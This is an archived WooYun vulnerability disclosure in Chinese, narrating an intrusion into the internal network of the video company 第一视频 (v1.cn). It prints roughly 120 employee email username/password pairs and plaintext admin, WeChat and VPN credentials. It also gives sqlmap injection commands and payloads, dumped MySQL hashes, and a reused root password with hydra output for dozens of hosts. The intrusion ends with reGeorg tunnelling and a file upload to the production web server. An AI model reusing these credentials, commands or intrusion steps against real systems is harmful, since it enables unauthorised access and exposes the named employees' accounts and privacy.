当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166852

漏洞标题:第一视频集团内网漫游(60台Linux已root/780w游戏用户/获取www主站权限)

相关厂商:第一视频

漏洞作者: hecate

提交时间:2016-01-02 18:42

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-02: 细节已通知厂商并且等待厂商处理中
2016-01-03: 厂商已经确认,细节仅向厂商公开
2016-01-13: 细节向核心白帽子及相关领域专家公开
2016-01-23: 细节向普通白帽子公开
2016-02-02: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

第一视频集团旗下v1.cn,中国足彩网,彩票365,第一游戏网
奇虎360某工程师中枪

详细说明:

1.入口 http://mail.v1.cn/
使用双拼字典 http://zone.wooyun.org/content/23175 以pitchfork形式对邮箱进行fuzzing,得到弱口令用户,然后登录邮箱脱出所有用户名再一次进行fuzz,得到如下结果

zhangjingyi	zhangjingyi@123
zhangzhongkun	zhangzhongkun@123
lijie	        lijie@123
zhangjiaquan	zhangjiaquan@123
jinlijing	jinlijing@123
wushiqiang	wushiqiang@123
zhouxulong	zhouxulong@123
wanglimei	wanglimei@123
sundong	        sundong@123
weiwei	        weiwei@123
guohao	        guohao@123
ychr	        ychr@123
fencheng	fencheng@123
renzheng	renzheng@123
v1boreport	v1boreport@123
security	security@123
caichengqi	caichengqi@123
caikunhao	caikunhao@123
changli        	changli@123
chenshuai	chenshuai@123
chenying	chenying@123
chenyushuang	chenyushuang@123
chenghengyan	chenghengyan@123
dingjingshun	dingjingshun@123
dongbaojun	dongbaojun@123
dongwenying	dongwenying@123
fanxue	        fanxue@123
feijiuling	feijiuling@123
houhaidong	houhaidong@123
hujing01	hujing01@123
cphunan	        cphunan@123
hudongyule	hudongyule@123
huanghuanhuan	huanghuanhuan@123
huitai	        huitai@123
huishuai	huishuai@123
huobaoqiang	huobaoqiang@123
jiaojingjing	jiaojingjing@123
jiaoxiaoxue	jiaoxiaoxue@123
kongpeng	kongpeng@123
lidi	        lidi@123
lifangfang	lifangfang@123
liguohe        	liguohe@123
lihe	        lihe@123
lijinxin	lijinxin@123
lilingyun	lilingyun@123
liyang	        liyang@123
liyongliang	liyongliang@123
lizhen	        lizhen@123
liujunhao	liujunhao@123
liuqiang	liuqiang@123
liushengtao	liushengtao@123
liushuhan	liushuhan@123
liuxiaoyu	liuxiaoyu@123
liuyanxia	liuyanxia@123
liuzhiyao	liuzhiyao@123
liuzhongming	liuzhongming@123
luyanlong	luyanlong@123
lvlili	        lvlili@123
lvmin	        lvmin@123
lvnanjun	lvnanjun@123
matian	        matian@123
maoqibing	maoqibing@123
nichong	        nichong@123
niejie	        niejie@123
niuyue	        niuyue@123
peiliying	peiliying@123
qisonghai	qisonghai@123
quyiwei	        quyiwei@123
shangchenwei	shangchenwei@123
shiyang	        shiyang@123
sunaili	        sunaili@123
sunzhimin	sunzhimin@123
wanghong	wanghong@123
wangjiao	wangjiao@123
wangjun         wangjun@123
wanglingling	wanglingling@123
照片wangshubing	wangshubing@123
wangxiaowei	wangxiaowei@123
wangyaodong	wangyaodong@123
wangzhongyu	wangzhongyu@123
weiman	        weiman@123
wuqiuqiang	wuqiuqiang@123
xiangchao	xiangchao@123
develop	        develop@123
xuluning	xuluning@123
xuebing	        xuebing@123
yanerkang	yanerkang@123
yangwei	        yangwei@123
yangxi	        yangxi@123
yangyonggang	yangyonggang@123
yangyunda	yangyunda@123
yinhuiting	yinhuiting@123
youle	        youle@123
ylgx	        ylgx@123
tianxianpei	tianxianpei@123
v1gamekefu	v1gamekefu@123
yuanchao	yuanchao@123
xunuo	        xunuo@123
zhangbo01	zhangbo01@123
zhanggaofan	zhanggaofan@123
zhangjianyang	zhangjianyang@123
zhangjingli	zhangjingli@123
zhangrong	zhangrong@123
zhangxuelun	zhangxuelun@123
zhangyi	        zhangyi@123
zhangyuanyuan	zhangyuanyuan@123
zhaohaixia	zhaohaixia@123
zhaolin	        zhaolin@123
zhaoxueying	zhaoxueying@123
zhengyunxue	zhengyunxue@123
zhonghua	zhonghua@123
zhouchunying	zhouchunying@123
zhujing        	zhujing@123
zongbianshi	zongbianshi@123
zoujieqi	zoujieqi@123
zuoweizhen	zuoweizhen@123


2.挨个登录邮箱收集信息,密码不少

V1游戏中心管理后台地址:http://pay.g.v1.cn/Z8Ex1iB5/adminLogin 
一级账号密码:v1game     b3&|EE
二级账号密码:sunyonghou     sunyonghou


一级账号通过了401认证,但是登录后台却密码错误,然后试试弱口令

liujunhao	123456
xiaoxiang	123123
wangshuai	123123
yuanchao	123456
luozhao		123456
liyang		123123
niejie		123123
wanghong        wanghong


随便登录一个

youxi_meitu_2.jpg


788万用户

youxi2_meitu_3.jpg


彩票365微信公众账号密码已修改,具体如下,请知悉,谢谢!
微信公众平台 http://mp.weixin.qq.com
账号:caipiao365@qq.com
密码:ycygcp#^%


111.png


第一彩后台 http://cms.diyicai.com/cms/太多弱口令

fengchao	123456
wangpeng	123456
lixiao          lixiao123
changli         changli@123
zhangguangchuan caibo2013
ceshibianji     editor2013


123.png


域名劫持

112.png


3.邮箱里面搜索vpn

vpn账号  guohao       密码GUO@vodone


拨入vpn,进入内网

vpn.png


windows下意外发现某3389弱口令为 111

Image 1_meitu_2.jpg


还开着360云盘,看了下牛逼的个人简历

245_meitu_1.jpg


奇虎360工程师中枪~~
再回到linux下面,先对内网80端口进行探测,发现主要存活主机在192.168.5和192.168.9段

222.png


一个废旧的办公系统存在大量弱口令,没找到有用的东西
直到找到另一个废站 http://192.168.9.105/
搜索框加单引号报错

111.png


sqlmap跑不出数据库,发现过滤了 > 符号,使用between替换

sqlmap -u "http://192.168.9.105/index.php?ctl=deals&k=" -p "k" --dbs --tamper between.py


192.168.9.105.png


跑出了库又跑不出表,加载多个脚本再一次绕过过滤

sqlmap -u "http://192.168.9.105/index.php?ctl=deals&k=" -p "k" -D "v1zhongchou" --count --tamper equaltolike.py,between.py,randomcase.py,space2comment.py --threads 5
Database: v1zhongchou
Table: fanwe_admin
[1 entry]
+----------+----------------------------------+----+
| adm_name | adm_password                     | id |
+----------+----------------------------------+----+
| admin    | 202cb962ac59075b964b07152d234b70 | 1  |
+----------+----------------------------------+----+


解密后登录后台,还可执行sql语句直接拿shell

111.png


123.png


没找到其他站点,继续探测同网段IP,找到这个后台 http://cms.v1cn/

122.png


并没有对外网解析
fuzz弱口令,多数密码为123456,登陆后发现注入点

http://cms.v1cn/focus/focus/ (POST)
cid=1000&title=&realname=
Parameter: realname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1000&title=&realname=%' AND 6721=6721 AND '%'='
Parameter: title (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1000&title=%' AND 8956=8956 AND '%'='&realname=
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: cid=1000&title=%';(SELECT * FROM (SELECT(SLEEP(5)))FUnQ)#&realname=
---
web application technology: PHP 5.6.8
back-end DBMS: MySQL 5.0.11


结果是root权限

database management system users password hashes:
[*] cms [1]:
    password hash: *A5C1E017AC4909CF2658F951F093855F6EBF8AE7
[*] debian-sys-maint [1]:
    password hash: *64931C7647F69D23E93C5B307D559ADD125AAECB
[*] report [1]:
    password hash: *8E2B5A8BF835E14935C5C7F3ADE1022CE13A371F
[*] root [2]:
    password hash: *06639D44E608EECBDA08F815172DEE51FDD424D8
    password hash: *1DBEB20659BE17A3D575ACFAF216A4154C6EF1D0
[*] v1boslave [1]:
    password hash: *35BC47EE0DCC18C5F034900CC52FF5EDDDAE0D39
[*] v1cmstmp [1]:
    password hash: *DB07F0E31219CFBA057CCBDD5C5045EE53EFCDE6


解密root密码尝试登录服务器

root   v1vodone


登陆成功

333_meitu_1.jpg


原来只是个反向代理服务器,找不到主域名在哪

444.png


4.使出hydra以 v1vodone 作为通用密码对网段22端口进行fuzzing,结果是令人欣慰的

[22][ssh] host: 192.168.5.15   login: root   password: v1vodone
[22][ssh] host: 192.168.5.3   login: root   password: v1vodone
[22][ssh] host: 192.168.5.2   login: root   password: v1vodone
[22][ssh] host: 192.168.5.5   login: root   password: v1vodone
[22][ssh] host: 192.168.5.36   login: root   password: v1vodone
[22][ssh] host: 192.168.5.75   login: root   password: v1vodone
[22][ssh] host: 192.168.5.73   login: root   password: v1vodone
[22][ssh] host: 192.168.5.96   login: root   password: v1vodone
[22][ssh] host: 192.168.5.173   login: root   password: v1vodone
[22][ssh] host: 192.168.5.172   login: root   password: v1vodone
[22][ssh] host: 192.168.9.50   login: root   password: v1vodone
[22][ssh] host: 192.168.9.21   login: root   password: v1vodone
[22][ssh] host: 192.168.9.33   login: root   password: v1vodone
[22][ssh] host: 192.168.9.49   login: root   password: v1vodone
[22][ssh] host: 192.168.9.18   login: root   password: v1vodone
[22][ssh] host: 192.168.9.35   login: root   password: v1vodone
[22][ssh] host: 192.168.9.107   login: root   password: v1vodone
[22][ssh] host: 192.168.9.53   login: root   password: v1vodone
[22][ssh] host: 192.168.9.102   login: root   password: v1vodone
[22][ssh] host: 192.168.9.130   login: root   password: v1vodone
[22][ssh] host: 192.168.9.51   login: root   password: v1vodone
[22][ssh] host: 192.168.9.128   login: root   password: v1vodone
[22][ssh] host: 192.168.9.56   login: root   password: v1vodone
[22][ssh] host: 192.168.9.110   login: root   password: v1vodone
[22][ssh] host: 192.168.9.125   login: root   password: v1vodone
[22][ssh] host: 192.168.9.131   login: root   password: v1vodone
[22][ssh] host: 192.168.9.106   login: root   password: v1vodone
[22][ssh] host: 192.168.9.132   login: root   password: v1vodone
[22][ssh] host: 192.168.9.105   login: root   password: v1vodone
[22][ssh] host: 192.168.9.129   login: root   password: v1vodone
[22][ssh] host: 192.168.9.109   login: root   password: v1vodone
[22][ssh] host: 192.168.9.152   login: root   password: v1vodone
[22][ssh] host: 192.168.9.153   login: root   password: v1vodone
[22][ssh] host: 192.168.9.151   login: root   password: v1vodone
[22][ssh] host: 192.168.9.160   login: root   password: v1vodone
[22][ssh] host: 192.168.9.195   login: root   password: v1vodone
[22][ssh] host: 192.168.9.171   login: root   password: v1vodone
[22][ssh] host: 192.168.9.197   login: root   password: v1vodone
[22][ssh] host: 192.168.9.238   login: root   password: v1vodone
[22][ssh] host: 192.168.9.223   login: root   password: v1vodone
[22][ssh] host: 192.168.9.216   login: root   password: v1vodone
[22][ssh] host: 192.168.9.206   login: root   password: v1vodone


真是呵呵了!
但是仍找不到主域名在哪,ping主域名只返回外网地址,然后查看hosts

cat /etc/hosts


3321_meitu_1.jpg


由此判断主要域名应在10网段,vpn拨进来的地址在 192.168.5段的办公网络,扫描10网段没发现存活主机,应该是被隔离了;
但是192.168.9段的服务器可以ping通10网段,so可以以此为跳板进入到生产网络,nginx作正向代理不好使,而且不支持https
这时用到了内网的第一个shell,reGeorg+proxychains作为代理

python reGeorgSocksProxy.py -p 9527 -u http://192.168.9.105/tunnel.php


然后继续用通用密码对10.20.1.1/24网段进行fuzz,结果不出所料

[22][ssh] host: 10.20.1.57   login: root   password: v1vodone
[22][ssh] host: 10.20.1.54   login: root   password: v1vodone
[22][ssh] host: 10.20.1.55   login: root   password: v1vodone
[22][ssh] host: 10.20.1.83   login: root   password: v1vodone
[22][ssh] host: 10.20.1.51   login: root   password: v1vodone
[22][ssh] host: 10.20.1.119   login: root   password: v1vodone
[22][ssh] host: 10.20.1.115   login: root   password: v1vodone
[22][ssh] host: 10.20.1.114   login: root   password: v1vodone
[22][ssh] host: 10.20.1.196   login: root   password: v1vodone
[22][ssh] host: 10.20.1.194   login: root   password: v1vodone
[22][ssh] host: 10.20.1.190   login: root   password: v1vodone
[22][ssh] host: 10.20.1.163   login: root   password: v1vodone
[22][ssh] host: 10.20.1.195   login: root   password: v1vodone
[22][ssh] host: 10.20.1.164   login: root   password: v1vodone
[22][ssh] host: 10.20.1.212   login: root   password: v1vodone
[22][ssh] host: 10.20.1.217   login: root   password: v1vodone
[22][ssh] host: 10.20.1.209   login: root   password: v1vodone
[22][ssh] host: 10.20.1.216   login: root   password: v1vodone
[22][ssh] host: 10.20.1.221   login: root   password: v1vodone
[22][ssh] host: 10.20.1.213   login: root   password: v1vodone
[22][ssh] host: 10.20.1.220   login: root   password: v1vodone
[22][ssh] host: 10.20.1.230   login: root   password: v1vodone
[22][ssh] host: 10.20.1.222   login: root   password: v1vodone
[22][ssh] host: 10.20.1.211   login: root   password: v1vodone


5.发现 10.20.1.17/18/19/119 这个几地址都指向主站

55.png


有负载均衡,但是通用密码恰好能登录 10.20.1.119

66.png


看了配置文件,主域名和二级域名都在

NameVirtualHost *:80
<VirtualHost *:80>
    DocumentRoot /VODONE/www/vodone.cms/publish/vodone/
    ServerName www.v1.cn
    Header unset ETag
    FileETag None
#    <Location ~ "/[0-9]{4}-[0-9]{2}-[0-9]{2}/">
#        ExpiresDefault "access plus 7 days"
#    </Location>
    CustomLog "|/VODONE/server/apache/bin/rotatelogs /VODONE/logs/apache/www.v1.cn_%Y%m%d.log 86400 480" combined
    RewriteEngine on
    RewriteCond %{QUERY_STRING} v=(\d+)$
    RewriteRule ^/js/video_detail.js http://www.v1.cn/js/video_detail.js? [L,R=302]
    RewriteCond %{QUERY_STRING} v=.*$
    RewriteRule ^/css/video_detail.css http://www.v1.cn/css/video_detail.css? [L,R=302]
    RewriteCond %{QUERY_STRING} ^(\d+)$
    RewriteRule ^/player/cloud/config.xml http://www.v1.cn/player/cloud/config.xml? [L,R=302]
    RewriteRule ^/(apps|news|shehui|mil|finance|sports|paike|bgt|ent|360movie|360tv|music|fun|culture|lady|auto|tech|games|life|travel|city|gongyi|special|topic)/(.*)    http://$1.v1.cn/$2  [L,R=301]
    RewriteRule ^/pic/([0-9]{4})-([0-9]{2})-([0-9]{2})/([0-9]+)_[0-9]+.shtml$ /pic/$1-$2-$3/$4.shtml [L]
    RewriteCond %{QUERY_STRING} ^toAlbumContent
    RewriteRule ^/([0-9]{4})-([0-9]{2})-([0-9]{2})/([0-9]+).shtml$ /focusAlbum.php?req=$0 [QSA,L]
</VirtualHost>
#<VirtualHost *:80>
#    DocumentRoot /VODONE/www/vodone.cms/publish/vodone/
#    ServerName mirrors.163.com
#    ProxyRequests On
#    ProxyPassMatch ^/(.*)$ http://mirrors.163.com/$1
#</VirtualHost>
<VirtualHost *:80>
    DocumentRoot /VODONE/www/vodone.cms/cms/public
    ServerName  g.cms.v1cn
    ServerAlias  www.g.cms.v1cn
    ProxyRequests On
    ProxyPass /voteadmin/ http://vote.v1.cn/admin/
    # Add Domains for ReverseProxy
    ProxyPassReverse /voteadmin/ http://vote.v1.cn/admin/
    RewriteEngine on
    RewriteRule ^/voteadmin/   -  [L]
    RewriteRule !\.(js|ico|txt|gif|jpg|png|css|swf|xml|flv|html|htm)$|.*(fckeditor/editor).* /index.php
</VirtualHost>
# httpd.conf already set "Options -Indexes FollowSymLinks" for /VODONE/www
<Directory "/VODONE/www/vodone.cms/work/vodone/">
        AllowOverride None
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/vodone/">
        AllowOverride None
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/work/spider/">
        AllowOverride None
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/spider/">
        AllowOverride None
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/work/games/">
        AllowOverride FileInfo Limit
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/games/">
       AllowOverride FileInfo Limit
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/publish/h5/">
       AllowOverride FileInfo Limit
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<Directory "/VODONE/www/vodone.cms/work/h5/">
       AllowOverride FileInfo Limit
        Options +Includes
        Order allow,deny
        Allow from all
</Directory>
<VirtualHost *:80>
    DocumentRoot /VODONE/www/vodone.cms/img/
    ServerName  image.v1.cn
    ServerAlias 0.image.v1.cn  1.image.v1.cn  2.image.v1.cn  3.image.v1.cn  4.image.v1.cn  5.image.v1.cn  6.image.v1.cn  7.image.v1.cn  8.image.v1.cn  9.image.v1.cn
    CustomLog "|/VODONE/server/apache/bin/rotatelogs /VODONE/logs/apache/image.v1.cn_%Y%m%d.log 86400 480" combined
</VirtualHost>
<VirtualHost *:80>
    DocumentRoot /VODONE/www/vodone.cms/publish/vodone/
    ServerName pub.cms.v1cn
</VirtualHost>
<VirtualHost *:80>
    DocumentRoot  /VODONE/www/vodone.cms/work/vodone/
    ServerName  work.cms.v1cn
</VirtualHost>
<VirtualHost *:80>
    DocumentRoot  /VODONE/www/vodone.cms/work/spider/
    ServerName  spider.cms.v1cn
</VirtualHost>

漏洞证明:

$ proxychains scp -r connf.html root@10.20.1.119:/VODONE/www/vodone.cms/publish/vodone/


111.png


修复方案:

弱口令和注入太多,仅仅上传了几个脚本,没有下载任何数据;
全过程没见到任何安全软件防护,贵公司毫无安全意识可言

版权声明:转载请注明来源 hecate@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-03 20:03

厂商回复:

感谢关注,请确保信息安全,谢谢

最新状态:

暂无